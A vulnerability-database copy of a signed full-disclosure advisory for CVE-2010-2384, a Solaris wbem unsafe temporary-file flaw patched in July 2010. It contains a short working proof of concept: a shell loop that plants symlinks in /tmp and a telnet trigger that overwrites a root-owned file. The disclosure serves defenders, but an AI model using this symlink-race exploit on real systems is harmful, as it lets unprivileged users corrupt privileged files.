Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24288
HistoryJul 20, 2010 - 12:00 a.m.

CVE-2010-2384: Solaris wbem unsafe use of temporary files

2010-07-2000:00:00
vulners.com
20

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Below is the full disclosure information for CVE-2010-2384. It was
reported to [email protected] on 3 January, 2010 and assigned Sun
bug 6913886.

This vulnerability was addressed by Sun/Oracle in the July 2010 Critical
Patch Update
(http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html).


When the wbem service is enabled
but hasn't been used before, it will run
/usr/sadm/lib/smc/prereg/SUNWrmui/SUNWrmui_reg.sh which can be exploited
by an unprivileged local user like this:

$ id
uid=101(fstuart) gid=14(sysadmin)
$ cd /tmp
$ x=0
$ while [ "$x" -ne 30000 ] ;do
> ln -s /etc/important /tmp/dummy.$x
> x=$(expr "$x" + 1)
> done
$ ls -dl /etc/important
-rw-r–r-- 1 root root 38 Jan 3 22:43 /etc/important
$ cat /etc/important
This is an important file!

  EOF

$ telnet localhost 898
Trying 127.0.0.1…
Connected to localhost.
Escape character is '^]'.

^]
telnet> quit
Connection to localhost closed.
$ cat /etc/important
/<\/Scope>/ {
n
i\
<Folder TreeDisplay="false"> \
<Name>SUNWrmui Bootstrap Folder</Name> \
<Description>This a temporary folder to workaround a bug. It
should be deleted during install. But if you do see it in the toolbox
editor, do NOT delete it.</Description> \
<Icon>status_16.gif</Icon> \
<LargeIcon>status_32.gif</LargeIcon> \
</Folder>
}

SUNWrmui_reg.sh also uses /tmp/this_computer.$$ which can also be
exploited.


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEVAwUBTEUMPmKGA6cQSpZSAQJXogf+PNSJwfSchgycCWHVpqknVm4KKJ1s/m0y
SWmbzxkoTuKR3hrW7cAPbUb2RHU92Ew587/uPIXhpUCaTrYImJUU9EYHoo132ZpL
KNEXQeqzMi2qaxQU6mkQBEA9Qc3VDh0kDcbDPjPJKShqb2k84CBq6ni39vb1zRlY
SVMldGCS5XflnjtINiwzdmnjNCVkMT4wtuFo3f2GhZaNKEOAKr2LVZT1KkYA6fmY
a6E5XFisQPBbVSPhN82ed7v73GTe5o09SDN3bHozV7x2ki4vxjCFau/hGG/NVNVD
NddIRtqVu8uodrI5hyt1gNXtTV9rT40GiAyOA1iuQHM7FmB8SXKI8w==
=8592
-----END PGP SIGNATURE-----

Related for SECURITYVULNS:DOC:24288